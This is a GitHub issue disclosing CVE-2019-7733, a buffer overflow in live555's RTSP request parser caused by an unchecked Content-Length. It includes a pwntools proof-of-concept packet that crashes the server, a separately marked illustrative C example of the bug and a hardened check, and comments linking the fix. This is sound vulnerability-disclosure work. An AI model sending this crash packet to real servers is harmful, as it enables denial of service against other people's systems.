
There is a buffer overflow which can lead to dos in live555 v0.95 #21

Open
zounathan opened this issue Feb 11, 2019 · 4 comments

@zounathan

When parsing the request packet in function handleRequestBytes, the code doesn't check the content-length, and uses it in memmove. Finally this causes the buffer overflow.

    unsigned requestSize = (fLastCRLF+4-fRequestBuffer) + contentLength;
    numBytesRemaining = fRequestBytesAlreadySeen - requestSize;
    resetRequestBuffer(); // to prepare for any subsequent request
    
    if (numBytesRemaining > 0) {
      memmove(fRequestBuffer, &fRequestBuffer[requestSize], numBytesRemaining);
      newBytesRead = numBytesRemaining;
    }

There is a content-length check, but it only sets parseSucceeded to false.
This can't prevent the memmove.

    Boolean parseSucceeded = parseRTSPRequestString((char*)fRequestBuffer, fLastCRLF+2 - fRequestBuffer,
                                                    cmdName, sizeof cmdName,
                                                    urlPreSuffix, sizeof urlPreSuffix,
                                                    urlSuffix, sizeof urlSuffix,
                                                    cseq, sizeof cseq,
                                                    sessionIdStr, sizeof sessionIdStr,
                                                    contentLength);
    fLastCRLF[2] = '\r'; // restore its value
    // Check first for a bogus "Content-Length" value that would cause a pointer wraparound:
    if (tmpPtr + 2 + contentLength < tmpPtr + 2) {
#ifdef DEBUG
      fprintf(stderr, "parseRTSPRequestString() returned a bogus \"Content-Length:\" value: 0x%x (%d)\n", contentLength, (int)contentLength);
#endif
      parseSucceeded = False;
    }

I can make the server crash with a simple packet.

    from pwn import *
    p1 = remote("IP", Port)

    pl = "OPTIONS rtsp://10.113.214.93:8554/a.mkv RTSP/1.0\r\nCSeq: 1 \r\nUser-Agent: Lavf55.37.102\r\n"
    pl += "Content-Length: 4294927296\r\n\r\n"
    p1.send(pl)
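An added example (not code from the issue or from live555) that models the bookkeeping quoted above: the unchecked path reproduces the unsigned wraparound the reporter's Content-Length triggers, and a hardened path rejects the value before any memmove. The buffer size, the enum and the function names are assumptions for illustration; the upstream fix is not reproduced here.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical request-buffer capacity; the real live555 constant is not on the page. */
#define REQUEST_BUFFER_SIZE 20000u

enum req_state { REQ_BOGUS, REQ_INCOMPLETE, REQ_COMPLETE };

/* Mirrors the arithmetic quoted in the issue. Nothing ties contentLength to the bytes
 * actually read, so a bogus Content-Length wraps numBytesRemaining (unsigned) while the
 * memmove source index (headerLen + contentLength) lands far outside fRequestBuffer. */
unsigned vulnerable_remaining(unsigned headerLen, unsigned contentLength, unsigned bytesSeen) {
  unsigned requestSize = headerLen + contentLength;
  unsigned numBytesRemaining = bytesSeen - requestSize; /* wraps: 100 - 4294927396 = 40000 */
  return numBytesRemaining;
}

/* Hardened bookkeeping (illustrative, not the upstream patch): compare by subtraction so
 * nothing can wrap, and reject a body that can never fit before any memory is touched. */
enum req_state checked_remaining(unsigned headerLen, unsigned contentLength, unsigned bytesSeen,
                                 unsigned bufSize, unsigned *requestSize, unsigned *remaining) {
  if (headerLen > bytesSeen || bytesSeen > bufSize) return REQ_BOGUS;
  if (contentLength > bufSize - headerLen) return REQ_BOGUS;        /* can never fit */
  if (contentLength > bytesSeen - headerLen) return REQ_INCOMPLETE; /* need more bytes */
  *requestSize = headerLen + contentLength; /* <= bufSize, no wrap */
  *remaining = bytesSeen - *requestSize;    /* <= bytesSeen, no wrap */
  return REQ_COMPLETE;
}

/* The memmove from the issue, reached only once the request has been validated. */
enum req_state consume_request(char *buf, unsigned bufSize, unsigned headerLen,
                               unsigned contentLength, unsigned *bytesSeen) {
  unsigned requestSize, remaining;
  enum req_state st = checked_remaining(headerLen, contentLength, *bytesSeen, bufSize,
                                        &requestSize, &remaining);
  if (st != REQ_COMPLETE) return st;
  if (remaining > 0) memmove(buf, &buf[requestSize], remaining); /* keep pipelined bytes */
  *bytesSeen = remaining;
  return st;
}

int main(void) {
  unsigned bogus = 4294927296u; /* the Content-Length from the issue's packet */
  printf("unchecked: memmove %u bytes from offset %u of a %u-byte buffer\n",
         vulnerable_remaining(100, bogus, 100), 100 + bogus, REQUEST_BUFFER_SIZE);
  /* Constructed input: 10-byte header, 2-byte body, then 6 bytes of a pipelined request. */
  char buf[REQUEST_BUFFER_SIZE] = "HEADERS...BBsecond";
  unsigned seen = 18;
  enum req_state st = consume_request(buf, REQUEST_BUFFER_SIZE, 10, 2, &seen);
  printf("checked: state %d, %u pipelined bytes moved to front: %.6s\n", st, seen, buf);
  return 0;
}
```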
@nluedtke

This was assigned CVE-2019-7733.

@hlef

hlef commented May 12, 2019

This was addressed in 2019.05.12, please close.

http://www.live555.com/liveMedia/public/changelog.txt

@NicoleG25

> This was addressed in 2019.05.12, please close.
>
> http://www.live555.com/liveMedia/public/changelog.txt

Could you kindly point me to the commit that fixed the issue?
Thanks :)

@hlef

hlef commented Jan 11, 2020

> > This was addressed in 2019.05.12, please close.
> > http://www.live555.com/liveMedia/public/changelog.txt
>
> Could you kindly point me to the commit that fixed the issue?
> Thanks :)

@NicoleG25 As far as I recall: ef01f0a, this line in particular https://github.com/rgaufman/live555/blob/master/liveMedia/RTSPServer.cpp#L717.
